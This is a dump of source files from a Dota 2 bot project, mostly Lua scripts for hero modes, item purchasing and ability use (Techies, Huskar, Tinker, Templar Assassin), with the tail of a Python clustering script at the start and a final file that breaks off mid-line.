\n for p1 in tempQueue:\n for i,p2 in enumerate(points):\n if samePoint(p1, p2):\n del points[i]\n break;\n \n clusters.append(s)\n \n return clusters\n\nstart = time.time()\nfor _ in range(0,60):\n tempList = list(trees)\n clusters = cluster(tempList)\n\nprint(time.time() - start)\n# for cluster in clusters:\n# for point in cluster:\n# print(str(point[0]) + \", \" + str(point[1]))\n# \n# print(\"----------------------\")\n "
},
{
"alpha_fraction": 0.6947869062423706,
"alphanum_fraction": 0.7047371864318848,
"avg_line_length": 33.76691818237305,
"blob_id": "d5d86dcde9ab1401cd6ea4d98fb397f380a2bb71",
"content_id": "c568299ca560f65854817584dd02a92eda4b66a0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Lua",
"length_bytes": 4623,
"license_type": "no_license",
"max_line_length": 150,
"num_lines": 133,
"path": "/mode_roam_techies.lua",
"repo_name": "vpus/vpesports-enhanced-bot",
"src_encoding": "UTF-8",
"text": "require(GetScriptDirectory()..\"/UtilityData\")\nrequire(GetScriptDirectory()..\"/UtilityFunctions\")\n\nlocal npcBot = GetBot()\nlocal botTeam = GetTeam()\nlocal mineCounter = 1\nlocal targetSet = false\n\nfunction OnStart()\n\tnpcBot.other_mode = BOT_MODE_ROAM\n\tnpcBot:Action_ClearActions(true)\nend\n\nfunction OnEnd()\n\tmineCounter = 1\nend\n\nfunction GetDesire()\n\tlocal botLevel = npcBot:GetLevel()\n\tlocal time = DotaTime()\n\t\n\tif time < 0 or botLevel >= 6 then\n\t\treturn _G.desires[6]\n\telse\n\t\treturn _G.desires[0]\n\tend\nend\n\nfunction Think()\n\t-- Abilities\n\tlocal ProximityMine = npcBot:GetAbilityByName(\"techies_land_mines\")\n\tlocal StasisTrap = npcBot:GetAbilityByName(\"techies_stasis_trap\")\n\tlocal BlastOff = npcBot:GetAbilityByName(\"techies_suicide\")\n\tlocal RemoteMine = npcBot:GetAbilityByName(\"techies_remote_mines\")\n\n\tlocal queue = npcBot:NumQueuedActions()\n\tlocal action = npcBot:GetCurrentActionType()\n\tlocal enemyTeam = (botTeam == TEAM_RADIANT) and TEAM_DIRE or TEAM_RADIANT\n\tlocal time = DotaTime()\n\t\n\tlocal enemyTowersTop = getAllTowersInLane(LANE_TOP, enemyTeam)\n\tlocal enemyTowersMid = getAllTowersInLane(LANE_MID, enemyTeam)\n\tlocal enemyTowersBot = getAllTowersInLane(LANE_BOT, enemyTeam)\n\n\tlocal allyTowersTop = getAllTowersInLane(LANE_TOP, botTeam)\n\tlocal allyTowersMid = getAllTowersInLane(LANE_MID, botTeam)\n\tlocal allyTowersBot = getAllTowersInLane(LANE_BOT, botTeam)\n\n\tlocal remoteLocSet = {}\n\t\n\tif time < 0 then\n\t\tlocal tower = GetTower(TEAM_RADIANT, TOWER_TOP_1)\n\t\t\n\t\tif action ~= BOT_ACTION_TYPE_MOVE_TO and action ~= BOT_ACTION_TYPE_USE_ABILITY then\n\t\t\tnpcBot:Action_MoveToLocation(tower:GetLocation())\n\t\tend\n\tend\n\t\n\tif action ~= BOT_ACTION_TYPE_USE_ABILITY and action ~= BOT_ACTION_TYPE_MOVE_TO then\n\t\t-- If all allied towers are destroyed, only plant around base\n\t\tif #allyTowersTop == 0 and #allyTowersMid == 0 and #allyTowersBot == 0 then\n\t\t\tremoteLocSet = _G.rad_base_remote_locs\n\t\t\n\t\t-- If all enemy towers are destroyed, only plant around enemy base\n\t\telseif #enemyTowersTop == 0 and #enemyTowersMid == 0 and #enemyTowersBot == 0 then\n\t\t\tremoteLocSet = _G.dir_base_remote_locs_attack\n\t\t-- If all allied towers in a lane are destroyed, alternate between roaming\n\t\t-- and planting around allied base\n\t\telse\n\t\t\tif #allyTowersTop == 0 then\n \t\t\tlocal tempSet = TableConcat(_G.rad_base_remote_locs, _G.rad_late_remote_locs)\n \t\t\tremoteLocSet = TableConcat(remoteLocSet, tempSet)\n \t\tend\n \t\t\n \t\tif #allyTowersMid == 0 then\n \t\t\tlocal tempSet = TableConcat(_G.rad_base_remote_locs, _G.rad_late_remote_locs)\n \t\t\tremoteLocSet = TableConcat(remoteLocSet, tempSet)\n \t\tend\n \t\t\n \t\tif #allyTowersBot == 0 then\n \t\t\tlocal tempSet = TableConcat(_G.rad_base_remote_locs, _G.rad_late_remote_locs)\n \t\t\tremoteLocSet = TableConcat(remoteLocSet, tempSet)\n \t\tend\n \t\t\n \t\t-- If all enemy towers in a lane are destroyed, alternate between roaming\n \t\t-- and planting around enemy base\n \t\tif #enemyTowersTop == 0 then\n \t\t\tlocal tempSet = TableConcat(_G.rad_base_remote_locs, _G.rad_late_remote_locs)\n \t\t\tremoteLocSet = TableConcat(remoteLocSet, tempSet)\n \t\tend\n \t\t\n \t\tif #enemyTowersMid == 0 then\n \t\t\tlocal tempSet = TableConcat(_G.rad_base_remote_locs, _G.rad_late_remote_locs)\n \t\t\tremoteLocSet = TableConcat(remoteLocSet, tempSet)\n \t\tend\n \t\t\n \t\tif #enemyTowersBot == 0 then\n \t\t\tlocal tempSet = 
TableConcat(_G.rad_base_remote_locs, _G.rad_late_remote_locs)\n \t\t\tremoteLocSet = TableConcat(remoteLocSet, tempSet)\n \t\tend\n \t\t\t\n \t\tif #enemyTowersTop > 0 and #enemyTowersMid > 0 and #enemyTowersBot > 0 and #allyTowersTop > 0 and #allyTowersMid > 0 and #allyTowersBot > 0 then\n \t\t\tremoteLocSet = TableConcat(_G.rad_early_remote_locs, _G.dir_early_remote_locs)\n \t\tend\n \tend\n\n\t\t-- Set the appropriate remote mine\n\t\tif #remoteLocSet > 0 then\n\t\t\tif mineCounter > table.getn(remoteLocSet) then\n\t\t\t\tmineCounter = 1\n\t\t\tend\n\t\t\tif RemoteMine:IsFullyCastable() and action ~= _G.actions[\"use_ability\"] then\n\t\t\t\tprint(\" MINE COUNTER: \" .. tostring(mineCounter))\n\t\t\t\tlocal remoteLoc = remoteLocSet[mineCounter]\n\t\t\t\tnpcBot:Action_UseAbilityOnLocation(RemoteMine, remoteLoc)\n\t\t\t\tmineCounter = mineCounter + 1\n\t\t\telseif GetUnitToLocationDistance(npcBot, remoteLocSet[mineCounter]) > 1000 and action ~= BOT_ACTION_TYPE_MOVE_TO then\n\t\t\t\tnpcBot:Action_MoveToLocation(remoteLocSet[mineCounter] + RandomVector(100))\n\t\t\tend\n\t\tend\n\tend\nend\n\n\n-- Returns a new table with t1's entries followed by t2's, without mutating either input\nfunction TableConcat(t1,t2)\n    local result = {}\n    for i=1,#t1 do\n        result[#result+1] = t1[i]\n    end\n    for i=1,#t2 do\n        result[#result+1] = t2[i]\n    end\n    return result\nend"
},
{
"alpha_fraction": 0.7272074818611145,
"alphanum_fraction": 0.7358219623565674,
"avg_line_length": 26.860000610351562,
"blob_id": "b1f2b315850d947f63fc9265ba7759b55ab3690e",
"content_id": "c556605b06910b29d7a39d16593e0d47a7f0b1d5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Lua",
"length_bytes": 1393,
"license_type": "no_license",
"max_line_length": 79,
"num_lines": 50,
"path": "/mode_secret_shop_techies.lua",
"repo_name": "vpus/vpesports-enhanced-bot",
"src_encoding": "UTF-8",
"text": "local npcBot = GetBot()\nlocal botTeam = npcBot:GetTeam()\n\nfunction OnStart()\n\tnpcBot.other_mode = BOT_MODE_SECRET_SHOP\nend\n\nfunction GetDesire()\n\tif npcBot.secretShop then\n\t\treturn 1\n\tend\n\t\n\treturn 0\nend\n\nfunction Think()\n\tlocal secretShopLoc = GetShopLocation(botTeam, SHOP_SECRET)\n--\tlocal courier = GetCourier(0)\n--\tif courier ~= nil then\n--\t\tlocal courierState = GetCourierState(courier)\n--\t\t\n--\t\tif courierState == COURIER_STATE_IDLE then\n--\t\t\t-- send courier to secret shop\n--\t\telseif courierState == COURIER_STATE_DELIVERING_ITEMS then\n--\t\t\t-- send bot to secret shop\n--\t\tend\n--\tend\n\tlocal rearm = npcBot:GetAbilityByName(\"tinker_rearm\");\n\tlocal bootsSlot = npcBot:FindItemSlot(\"item_travel_boots\")\n\tlocal boots = nil\n\tif npcBot:GetItemSlotType(bootsSlot) == ITEM_SLOT_TYPE_MAIN then\n\t\tboots = npcBot:GetItemInSlot(bootsSlot)\n\tend\n\n\tlocal secretDist = npcBot:DistanceFromSecretShop()\n\t\n\tif secretDist > 0 then\n\t\tif boots ~= nil and not npcBot:IsChanneling() and secretDist > 2000 then\n\t\t\tif boots:IsFullyCastable() then\n\t\t\t\tnpcBot:Action_UseAbilityOnLocation(boots, secretShopLoc)\n\t\t\telseif not boots:IsCooldownReady() and rearm:IsOwnersManaEnough() then\n\t\t\t\tnpcBot:Action_UseAbility(rearm)\n\t\t\tend\n\t\telseif (not npcBot:IsChanneling() and secretDist < 2000) or boots == nil then\n\t\t\tnpcBot:Action_MoveToLocation(secretShopLoc)\n\t\tend\n\telse\n\t\tnpcBot.secretShop = false\n\tend\nend\n"
},
{
"alpha_fraction": 0.6868856549263,
"alphanum_fraction": 0.6902421712875366,
"avg_line_length": 34.94827651977539,
"blob_id": "41ad5798c9f5ff763d127d21e9ed474fb39bef74",
"content_id": "92fae3a349d4d2e275e9c8d541177bdd13a0b1e7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Lua",
"length_bytes": 4171,
"license_type": "no_license",
"max_line_length": 111,
"num_lines": 116,
"path": "/item_purchase_abyssal_underlord.lua",
"repo_name": "vpus/vpesports-enhanced-bot",
"src_encoding": "UTF-8",
"text": "local npcBot = GetBot()\n\nlocal purchase = require(GetScriptDirectory() .. \"/item_build_abyssal_underlord\");\n\nlocal itemsPurchase = purchase[\"items\"]\n\nfunction ItemPurchaseThink()\n--\tif GetGameState() ~= GAME_STATE_PRE_GAME and GetGameState() ~= GAME_STATE_GAME_IN_PROGRESS then\n--\t\treturn;\n--\tend\n\t\n\tlocal botHP = npcBot:GetHealth()\n\tlocal botMaxHP = npcBot:GetMaxHealth()\n\tlocal botMana = npcBot:GetMana()\n\tlocal botMaxMana = npcBot:GetMaxMana()\n\t\n\tlocal itemIndex = nil\n\t\n\tfor i = 1, #itemsPurchase do\n\t\tif itemsPurchase[i] ~= \"none\" then\n\t\t\titemIndex = i\n\t\t\tbreak\n\t\tend\n\tend\n\t\n\tif itemIndex == nil then\n\t\treturn\n\tend\n\t\n\tlocal botGold = npcBot:GetGold()\n\tlocal itemCost = GetItemCost(itemsPurchase[itemIndex])\n\t\n\tif botGold >= itemCost then\n\t\tlocal sideShop = IsItemPurchasedFromSideShop(itemsPurchase[itemIndex])\n\t\tlocal secretShop = IsItemPurchasedFromSecretShop(itemsPurchase[itemIndex])\n\t\tlocal sideShopDistance = npcBot:DistanceFromSideShop()\n\t\tlocal secretShopDistance = npcBot:DistanceFromSecretShop()\n\t\tlocal fountainDistance = npcBot:DistanceFromFountain()\n\t\t\n--\t\tprint(\"Side Shop? \" .. tostring(sideShop)\n--\t\t.. \" Secret Shop? \" .. tostring(secretShop)\n--\t\t.. \" Side Shop Distance: \" .. tostring(sideShopDistance) \n--\t\t.. \" Secret Shop Distance: \" .. tostring(secretShopDistance)\n--\t\t.. \" Fountain Distance: \" .. tostring(fountainDistance))\n\t\t\n\t\tif secretShop then\n\t\t\t-- npcBot.secretShop = true -- lets the secret shop mode know to switch\n\t\t\t-- if secretShopDistance == 0 then\n\t\t\t-- \tlocal result = npcBot:ActionImmediate_PurchaseItem(itemsPurchase[itemIndex])\n\t\t\t-- \tprint(\"Purchasing \" .. itemsPurchase[itemIndex] .. \": \" .. tostring(result))\n \t\t-- \tif result == PURCHASE_ITEM_SUCCESS then\n \t\t-- \t\titemsPurchase[itemIndex] = \"none\"\n \t\t-- \telse\n \t\t-- \t\tprint(\" Item Not Purchased: \" .. tostring(result) .. \" : \" .. tostring(itemsPurchase[itemIndex]))\n \t\t-- \tend\n\t\t\t-- end\n\t\t\t-- move courier to secret shop --\n\t\t\tif secretShopDistance > 200000 then\n\t\t\t\tcourier = GetCourier(0)\n\t\t\t\tstate = GetCourierState(courier)\n\t\t\t\tif courier ~= nil then\n\t\t\t\t\tif state == COURIER_STATE_IDLE or state == COURIER_STATE_AT_BASE then\n\t\t\t\t\t\tnpcBot:ActionImmediate_Courier(courier, COURIER_ACTION_SECRET_SHOP)\n\t\t\t\t\tend\n\t\t\t\tend\n\t\t\t\tlocal result = npcBot:ActionImmediate_PurchaseItem(itemsPurchase[itemIndex])\n\t\t\t\tprint(\"Purchasing \" .. itemsPurchase[itemIndex] .. \": \" .. tostring(result))\n\t\t\t\tif result == PURCHASE_ITEM_SUCCESS then\n\t\t\t\t\titemsPurchase[itemIndex] = \"none\"\n\t\t\t\t\tnpcBot:ActionImmediate_Courier(courier, COURIER_ACTION_RETURN)\n\t\t\t\tend\n\t\t\telse\n\t\t\t\tnpcBot.secretShop = true -- lets the secret shop mode know to switch\n\t\t\t\tif secretShopDistance == 0 then\n\t\t\t\t\tlocal result = npcBot:ActionImmediate_PurchaseItem(itemsPurchase[itemIndex])\n\t\t\t\t\tprint(\"Purchasing \" .. itemsPurchase[itemIndex] .. \": \" .. tostring(result))\n\t\t\t\t\tif result == PURCHASE_ITEM_SUCCESS then\n\t\t\t\t\t\titemsPurchase[itemIndex] = \"none\"\n\t\t\t\t\telse\n\t\t\t\t\t\tprint(\" Item Not Purchased: \" .. tostring(result) .. \" : \" .. tostring(itemsPurchase[itemIndex]))\n\t\t\t\t\tend\n\t\t\t\tend\n\t\t\tend\n\t\telseif not secretShop then\n\t\t\tlocal result = npcBot:ActionImmediate_PurchaseItem(itemsPurchase[itemIndex])\n\t\t\tprint(\"Purchasing \" .. 
itemsPurchase[itemIndex] .. \": \" .. tostring(result))\n\t\t\tif result == PURCHASE_ITEM_SUCCESS then\n\t\t\t\titemsPurchase[itemIndex] = \"none\"\n\t\t\telse\n\t\t\t\tprint(\" Item Not Purchased: \" .. tostring(result) .. \" : \" .. tostring(itemsPurchase[itemIndex]))\n\t\t\tend\n\t\tend\n\tend\n\t\n\tif npcBot:GetStashValue() > 0 then\n\t\tlocal courier = GetCourier(0)\n\t\t\n\t\tif courier ~= nil then\n\t\t\tlocal state = GetCourierState(courier)\n\t\t\tif state == COURIER_STATE_IDLE or (state == COURIER_STATE_AT_BASE and npcBot:IsAlive()) then\n\t\t\t\tnpcBot:ActionImmediate_Courier(courier, COURIER_ACTION_TAKE_AND_TRANSFER_ITEMS)\n\t\t\tend\n\t\tend\n\tend\n\n\tif npcBot:GetCourierValue() > 0 then\n\t\tlocal courier = GetCourier(0)\n\t\t\n\t\tif courier ~= nil then\n\t\t\tlocal state = GetCourierState(courier)\n\t\t\tif state == COURIER_STATE_IDLE or (state == COURIER_STATE_AT_BASE and npcBot:IsAlive()) then\n\t\t\t\tnpcBot:ActionImmediate_Courier(courier, COURIER_ACTION_TRANSFER_ITEMS)\n\t\t\tend\n\t\tend\n\tend\nend\n"
},
{
"alpha_fraction": 0.7212041616439819,
"alphanum_fraction": 0.727748692035675,
"avg_line_length": 22.90625,
"blob_id": "513cf3c827a6c925bc41a822ed8df58993116001",
"content_id": "6e988e1b05c87916fe3195fc08a3faf7691ce61a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Lua",
"length_bytes": 764,
"license_type": "no_license",
"max_line_length": 70,
"num_lines": 32,
"path": "/bot_templar_assassin.lua",
"repo_name": "vpus/vpesports-enhanced-bot",
"src_encoding": "UTF-8",
"text": "require(GetScriptDirectory()..\"/UtilityData\")\nrequire(GetScriptDirectory()..\"/UtilityFunctions\")\n\nlocal npcBot = GetBot()\nlocal botTeam = GetTeam()\nnpcBot.traps = {}\nnpcBot.max_traps = 5\nnpcBot.attacking = false\n\nfunction MinionThink(trap)\n\tlocal trigger = trap:GetAbilityByName(\"templar_assassin_trap\")\n\tlocal trap = trap:GetUnitName();\n\tif trap == \"npc_dota_templar_assassin_psionic_trap\" then\n\t\taddTrap(trap) -- Add trap to list if it isn't already\n\t\t\n\t\tlocal nearbyEnemies = trap:GetNearbyHeroes(380, true, BOT_MODE_NONE)\n\t\t\n\t\tif table.getn(nearbyEnemies) > 0 then\n\t\t\ttrap:Action_UseAbility(trigger)\n\t\tend\n\tend\nend\n\nfunction addTrap(trap)\n\tfor i, v in ipairs(npcBot.traps) do\n\t\tif v == trap then\n\t\t\treturn\n\t\tend\n\tend\n\t\n\ttable.insert(npcBot.traps, trap)\nend"
},
{
"alpha_fraction": 0.6096000075340271,
"alphanum_fraction": 0.6168000102043152,
"avg_line_length": 37.11585235595703,
"blob_id": "1f0f40297fdfb091649c7dee0831741932b34c4b",
"content_id": "b6f6ded341f6dfd3d945940b39e8314e1c5d7adc",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Lua",
"length_bytes": 6250,
"license_type": "no_license",
"max_line_length": 165,
"num_lines": 164,
"path": "/ability_item_usage_huskar.lua",
"repo_name": "vpus/vpesports-enhanced-bot",
"src_encoding": "UTF-8",
"text": "local build = require(GetScriptDirectory()..\"/item_build_huskar\")\nrequire(GetScriptDirectory()..\"/UtilityData\")\nrequire(GetScriptDirectory()..\"/UtilityFunctions\")\n\nlocal npcBot = GetBot()\nlocal botTeam = GetTeam()\nlocal lane_claim = true\n\nfunction AbilityLevelUpThink()\n local skillsToLevel = build[\"skills\"]\n-- if npcBot:GetAbilityPoints() < 1 or (GetGameState() ~= GAME_STATE_PRE_GAME \n-- \tand GetGameState() ~= GAME_STATE_GAME_IN_PROGRESS) then\n-- return\n-- end\n -- for i, item in pairs(skillsToLevel) do\n -- print(i, item)\n -- end\n if npcBot:GetAbilityPoints() > 0 and skillsToLevel[1] ~= \"-1\" \n \tand skillsToLevel[1] ~= nil then\n \tnpcBot:ActionImmediate_LevelAbility(skillsToLevel[1])\n \ttable.remove(skillsToLevel, 1)\n end\nend\n\nfunction AbilityUsageThink()\n local botMana = npcBot:GetMana()\n local botHealth = npcBot:GetHealth()\n local botMaxHealth = npcBot:GetMaxHealth()\n local bot_location_x = npcBot:GetLocation()[1]\n local bot_location_y = npcBot:GetLocation()[2]\n local action = npcBot:GetCurrentActionType()\n local action_mode = npcBot:GetActiveMode()\n\n local inner_vitality = npcBot:GetAbilityByName(\"huskar_inner_vitality\")\n local burning_spear = npcBot:GetAbilityByName(\"huskar_burning_spear\")\n local berserkers_blood = npcBot:GetAbilityByName(\"huskar_berserkers_blood\")\n local life_break = npcBot:GetAbilityByName(\"huskar_life_break\")\n\n -- Check if Inner Vitality is castable and if is used --\n if npcBot:HasModifier(\"modifier_huskar_life_break_charge\") and not npcBot:HasModifier(\"modifier_huskar_inner_vitality\") and inner_vitality:IsFullyCastable() then\n print(\"Ability : Using Inner Vitality while Life Break\")\n npcBot:Action_UseAbilityOnEntity(inner_vitality, npcBot)\n end\n\n local armletSlot = npcBot:FindItemSlot(\"item_armlet\")\n local armlet = nil\n if npcBot:GetItemSlotType(armletSlot) == ITEM_SLOT_TYPE_MAIN then\n armlet = npcBot:GetItemInSlot(armletSlot)\n end\n if armlet ~= nil then\n local nearbyEnemies = npcBot:GetNearbyHeroes(900, true, BOT_MODE_NONE)\n if npcBot:HasModifier(\"modifier_item_armlet_unholy_strength\") then\n if armlet:IsFullyCastable() and #nearbyEnemies < 1 and action_mode ~= 2 then\n npcBot:Action_UseAbility(armlet)\n elseif #nearbyEnemies >= 1 and botHealth < 300 then\n npcBot:Action_UseAbility(armlet)\n npcBot:Action_UseAbility(armlet)\n end\n else\n if armlet:IsFullyCastable() and #nearbyEnemies >= 2 then\n npcBot:Action_UseAbility(armlet)\n end\n end\n end\n\n -- Burning Spear Toggle --\n -- print(\"mode:\",action_mode)\n -- print(\"spear mode\", burning_spear:GetAutoCastState())\n if action_mode ~= BOT_MODE_ATTACK then\n -- print(\"not attacking\", burning_spear:GetAutoCastState())\n if burning_spear:GetAutoCastState() then\n -- print(\"Toggle it OFF\")\n burning_spear:ToggleAutoCast()\n end\n else\n -- print(\"attacking\", burning_spear:GetAutoCastState())\n if not burning_spear:GetAutoCastState() then\n -- print(\"Toggle it ON\")\n burning_spear:ToggleAutoCast()\n end\n end\n\n if action ~= BOT_ACTION_TYPE_USE_ABILITY and action ~= BOT_ACTION_TYPE_ATTACK then\n -- life_break think --\n if life_break ~= nil and life_break:IsFullyCastable() then\n action_mode = npcBot:GetActiveMode()\n if action_mode == BOT_MODE_ATTACK then\n local nearbyEnemies = npcBot:GetNearbyHeroes(1200, true, BOT_MODE_NONE)\n local weakerEnemy = nil\n\n for k, enemy in pairs(nearbyEnemies) do\n if weakerEnemy == nil then\n weakerEnemy = enemy\n else\n if enemy:GetRawOffensivePower() < 
weakerEnemy:GetRawOffensivePower() then\n                            weakerEnemy = enemy\n                        end\n                    end\n                end\n\n                print(\"Ability : Using Life Break\")\n                npcBot:Action_UseAbilityOnEntity(life_break, weakerEnemy)\n            end\n        end\n\n        -- inner vitality think --\n        local bot_percentage = botHealth / botMaxHealth\n        if bot_percentage < 0.35 and not npcBot:HasModifier(\"modifier_huskar_inner_vitality\") and inner_vitality:IsFullyCastable() then\n            print(\"Ability : Using Inner Vitality at low HP\")\n            npcBot:Action_UseAbilityOnEntity(inner_vitality, npcBot)\n        end\n    end\n\n    if action_mode == BOT_MODE_LANING then\n        -- check creep aggression --\n        local nearbyCreeps = npcBot:GetNearbyLaneCreeps(1000, true)\n        local count = 0\n        for i, creep in pairs(nearbyCreeps) do\n            if creep:GetAttackTarget() == npcBot then\n                count = count + 1\n            end\n        end\n\n        -- check tower aggression --\n        local nearbyTowers = npcBot:GetNearbyTowers(700, true)\n        for i, tower in pairs(nearbyTowers) do\n            if tower:GetAttackTarget() == npcBot then\n                count = count + 4\n            end\n        end\n\n        local nearbyEnemies = npcBot:GetNearbyHeroes(700, true, BOT_MODE_NONE)\n        local weakerEnemy = nil\n\n        for k, enemy in pairs(nearbyEnemies) do\n            if weakerEnemy == nil then\n                weakerEnemy = enemy\n            else\n                if enemy:GetHealth() < weakerEnemy:GetHealth() then\n                    weakerEnemy = enemy\n                end\n            end\n        end\n\n        if weakerEnemy ~= nil and count <= 2 then\n            npcBot:Action_UseAbilityOnEntity(burning_spear, weakerEnemy)\n        end\n    end\nend\n\nfunction BuybackUsageThink()\n    if DotaTime() < -30 and lane_claim then\n        local lane_id = npcBot:GetAssignedLane()\n        if lane_id == 1 then\n            npcBot:ActionImmediate_Chat(\"I'm going Top!\", false)\n        elseif lane_id == 2 then\n            npcBot:ActionImmediate_Chat(\"I'm going Mid!\", false)\n        elseif lane_id == 3 then\n            npcBot:ActionImmediate_Chat(\"I'm going Bot!\", false)\n        end\n        lane_claim = false\n    end\n    return\nend"
},
{
"alpha_fraction": 0.7202268242835999,
"alphanum_fraction": 0.7240075469017029,
"avg_line_length": 26.842105865478516,
"blob_id": "0ba935d5990c35a7471995fa3319b4e83f62bf94",
"content_id": "6b572709505001352c6717c00b945cfbba53314c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Lua",
"length_bytes": 529,
"license_type": "no_license",
"max_line_length": 65,
"num_lines": 19,
"path": "/mode_laning_tinker.lua",
"repo_name": "vpus/vpesports-enhanced-bot",
"src_encoding": "UTF-8",
"text": "require(GetScriptDirectory()..\"/UtilityData\");\nrequire(GetScriptDirectory()..\"/UtilityFunctions\");\n\nlocal npcBot = GetBot();\nlocal botTeam = GetTeam();\nlocal botLocArray = {};\n\nfunction GetDesire()\n\tlocal gameTime = DotaTime()\n\tlocal mode = npcBot:GetActiveMode();\n\tlocal modeDesire = npcBot:GetActiveModeDesire();\n\tlocal bootsSlot = npcBot:FindItemSlot(\"item_travel_boots\")\n\t\n\tif npcBot:GetItemSlotType(bootsSlot) == ITEM_SLOT_TYPE_MAIN then\n\t\treturn _G.desires[0]\n\tend\n--\tprint(gameTime)\n\treturn _G.desires[5];\nend\n"
},
{
"alpha_fraction": 0.7188012003898621,
"alphanum_fraction": 0.7303652167320251,
"avg_line_length": 33.59000015258789,
"blob_id": "fa50a62729e43dc265f199f17a753a321ea735dd",
"content_id": "62d03fe8462ff7167696f74a5fc96ecb80d1a0f2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Lua",
"length_bytes": 10377,
"license_type": "no_license",
"max_line_length": 204,
"num_lines": 300,
"path": "/ability_item_usage_techies.lua",
"repo_name": "vpus/vpesports-enhanced-bot",
"src_encoding": "UTF-8",
"text": "local build = require(GetScriptDirectory()..\"/item_build_techies\")\nrequire(GetScriptDirectory()..\"/UtilityData\")\nrequire(GetScriptDirectory()..\"/UtilityFunctions\")\n\nlocal npcBot = GetBot()\nlocal botTeam = GetTeam()\n\nlocal mine = npcBot:GetAbilityByName(\"techies_land_mines\")\nlocal stasis = npcBot:GetAbilityByName(\"techies_stasis_trap\")\nlocal blast = npcBot:GetAbilityByName(\"techies_suicide\")\nlocal remote = npcBot:GetAbilityByName(\"techies_remote_mines\")\nlocal lane_claim = true\n\nfunction BuybackUsageThink()\n if DotaTime() < -30 and lane_claim then\n local lane_id = npcBot:GetAssignedLane()\n if lane_id == 1 then\n npcBot:ActionImmediate_Chat(\"I'm going Top!\", false)\n elseif lane_id == 2 then\n npcBot:ActionImmediate_Chat(\"I'm going Mid!\", false)\n elseif lane_id == 3 then\n npcBot:ActionImmediate_Chat(\"I'm going Bot!\", false)\n end\n lane_claim = false\n end\n return\nend\n\nfunction AbilityLevelUpThink()\n\tlocal skillsToLevel = build[\"skills\"]\n\tif npcBot:GetAbilityPoints() > 0 and skillsToLevel[1] ~= nil then\n\t\tnpcBot:ActionImmediate_LevelAbility(skillsToLevel[1])\n\t\ttable.remove(skillsToLevel, 1)\n\tend\nend\n\n-- Logic for all Ability Usage behavior\nfunction AbilityUsageThink()\n\t-- Stats\n\tlocal currMana = npcBot:GetMana()\n\tlocal maxMana = npcBot:GetMaxMana()\n\tlocal currHP = npcBot:GetHealth()\n\tlocal maxHP = npcBot:GetMaxHealth()\n\tlocal mode = npcBot:GetActiveMode()\n\tlocal queue = npcBot:NumQueuedActions()\n\tlocal action = npcBot:GetCurrentActionType()\n\n\t-- Surroundings\n\tlocal nearbyEnemies = npcBot:GetNearbyHeroes(1000, true, BOT_MODE_NONE)\n\t----------------------------------------------------------------------------\n\n\t-- Use Proximity Mines and Remote Mines\n--\tif remote:IsFullyCastable() and action ~= BOT_ACTION_TYPE_USE_ABILITY then\n--\t\t-- Find the closest Remote Mine location and drop one\n--\t\tlocal distFromClosestLoc, closestLoc = getClosestLocation(npcBot)\n--\n--\t\tif distFromClosestLoc <= 1000 then\n--\t\t\tnpcBot:Action_UseAbilityOnLocation(remote,closestLoc)\n--\t\tend\n--\telse\n\tif mine:IsFullyCastable() and action ~= BOT_ACTION_TYPE_USE_ABILITY then \n\t\t-- drop a proximity mine near a tree near creeps\n\t\tlocal nearestCreep, nearestCreepDist = getNearestCreep()\n\t\tlocal trees = npcBot:GetNearbyTrees(1000)\n\n\t\tif table.getn(trees) > 0 and nearestCreepDist ~= nil and nearestCreepDist < 1500 and action ~= BOT_ACTION_TYPE_USE_ABILITY and action ~= BOT_ACTION_TYPE_ATTACK and action ~= BOT_ACTION_TYPE_MOVE_TO then\n\t\t\tlocal treeLoc = GetTreeLocation(trees[1]) + RandomVector(200)\n\t\t\t-- print (\"DROPPING Proximity Mine at: \"..treeLoc)\n\t\t\t-- print(nearestCreepDist, trees[1])\n\t\t\tif treeLoc[1] > -6800 then\n\t\t\t\tnpcBot:Action_UseAbilityOnLocation(mine, treeLoc)\n\t\t\tend\n\t\tend\n\tend\n\t\n\tif npcBot:GetActiveMode() == BOT_MODE_RETREAT and npcBot.other_mode == BOT_MODE_ROAM then\n\t\tif stasis:IsFullyCastable() and action ~= BOT_ACTION_TYPE_USE_ABILITY then\n\t\t\tnpcBot:Action_UseAbilityOnLocation(stasis, npcBot:GetLocation() + RandomVector(50))\n\t\tend\n\tend\nend\n\nfunction ItemUsageThink()\n\tlocal bottleLoc = npcBot:FindItemSlot(\"item_bottle\")\n\tlocal bottle = nil\n\tlocal bottleSlot = nil\n\tlocal botMana = npcBot:GetMana()\n\tlocal botMaxMana = npcBot:GetMaxMana()\n\tlocal botHP = npcBot:GetHealth()\n\tlocal botMaxHP = npcBot:GetMaxHealth()\n\tlocal currentMode = npcBot:GetActiveMode()\n\t\n\tlocal nearbyTrees = npcBot:GetNearbyTrees(1600)\n\tlocal 
nearbyEnemies = npcBot:GetNearbyHeroes(1600, true, BOT_MODE_NONE)\n\t\n\tlocal bountyTopRadLoc = GetRuneSpawnLocation(RUNE_BOUNTY_1)\n\tlocal bountyBotRadLoc = GetRuneSpawnLocation(RUNE_BOUNTY_2)\n\tlocal bountyTopDirLoc = GetRuneSpawnLocation(RUNE_BOUNTY_3)\n\tlocal bountyBotDirLoc = GetRuneSpawnLocation(RUNE_BOUNTY_4)\n\t\n\tlocal bountyTopRadDist = GetUnitToLocationDistance(npcBot, bountyTopRadLoc)\n\tlocal bountyBotRadDist = GetUnitToLocationDistance(npcBot, bountyBotRadLoc)\n\tlocal bountyTopDirDist = GetUnitToLocationDistance(npcBot, bountyTopDirLoc)\n\tlocal bountyBotDirDist = GetUnitToLocationDistance(npcBot, bountyBotDirLoc)\n\t\n\tlocal enemies = npcBot:GetNearbyHeroes(1600, true, BOT_MODE_NONE)\n\n\tlocal clarity = nil\n\tlocal bottle = nil\n\tlocal salve = nil\n\tlocal tango = nil\n\tlocal soul = nil\n\tlocal boots = nil\n\tlocal portal = nil\n\tlocal arcane = nil\n\tlocal cyclone = nil\n\t\n\tlocal courierLoc = npcBot:FindItemSlot(\"item_courier\")\n\tlocal clarityLoc = npcBot:FindItemSlot(\"item_clarity\")\n\tlocal bottleLoc = npcBot:FindItemSlot(\"item_bottle\")\n\tlocal 